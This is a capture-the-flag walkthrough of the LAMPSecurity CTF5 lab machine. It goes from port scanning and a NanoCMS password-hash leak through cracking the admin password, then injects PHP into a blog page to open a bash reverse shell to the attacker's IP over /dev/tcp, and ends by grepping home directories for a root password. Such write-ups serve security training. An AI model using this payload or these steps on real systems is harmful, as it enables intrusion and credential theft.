- VM: LAMPSecurity: CTF5
- Goal: Gain root access
- Approach: solve without automated exploitation tools
nmap -sn 192.168.172.200-254
nmap -p- -A 192.168.172.240
- Port 22: OpenSSH 4.7
- Port 25: SMTP
- Port 80: Apache httpd 2.2.6
- Port 110: pop3 ipop3d 2006k.101
- Port 111: RPC #100000
- Port 139: Samba smbd 3.X – 4.X (workgroup: MYGROUP)
- Port 143: University of Washington IMAP imapd 2006k.396
- Port 445: Samba 3.0.26a-6.fc8
- Port 901: Samba SWAT administration server
- Port 3306: MySQL 5.0.45
There’s quite a few ports open. First let’s check out the website.
I test around the site against SQL injection but didn’t find any.
Then identified LFI (local file inclusion) vulnerability against the page parameter.
Further checking the website shows that the website is using NanoCMS for Blogging (Blog tab).
Google about NanoCMS vulnerability quickly showed /data/pagesdata.txt exposes password hash. Try on the website and returned the file with password hash.
username: admin, password hash: 9d2f75377ac0ab991d40c91fd27e52fd
The hash has 32 hex characters so most likely MD5 hash.I use website md5decrypt.net and is able to find the password quickly: shannon
username: admin, password: shannon
All right. Good start. Let’s try to login at the Admin Login of Andy’s Blog page. And sure enough, login successfully to the NanoCMS Admin Panel.
I look around the Admin Panel and quickly spot something very interesting: ‘New Page‘. Looks like I can create new blog pages there. I quickly create a new blog page with simple php code to test if php code execution is allowed.
I added the Page and then click on new blog page ‘Testing‘ at Pages & Options.
Awesome. Php code execution is allowed.
We can use php code execution to create a reverse shell. First start Netcat at kali box to listen to port 4444:
nc -lp 4444
Then modify the Testing blog page content to: (note: kali box ip address is 192.168.172.110)
<?php system("bash -i >& /dev/tcp/192.168.172.110/4444 0>&1"); ?>
Now refresh the Testing blog page again and observe the kali box:
That’s great. We got a shell access as user apache
With shell access, we search around the system looking for useful information to gain root access. That include sudo usage, setuid commands, configuration files & users’ files.
Luckily, we come across the root password while searching for password recursively in /home directory using the following search command:
grep -R -i password /home/* 2> /dev/null
Looks like the .note file in patrick’s folder may have root password.
Root password: 50$cent
Let’s try it out
Bingo! Root access.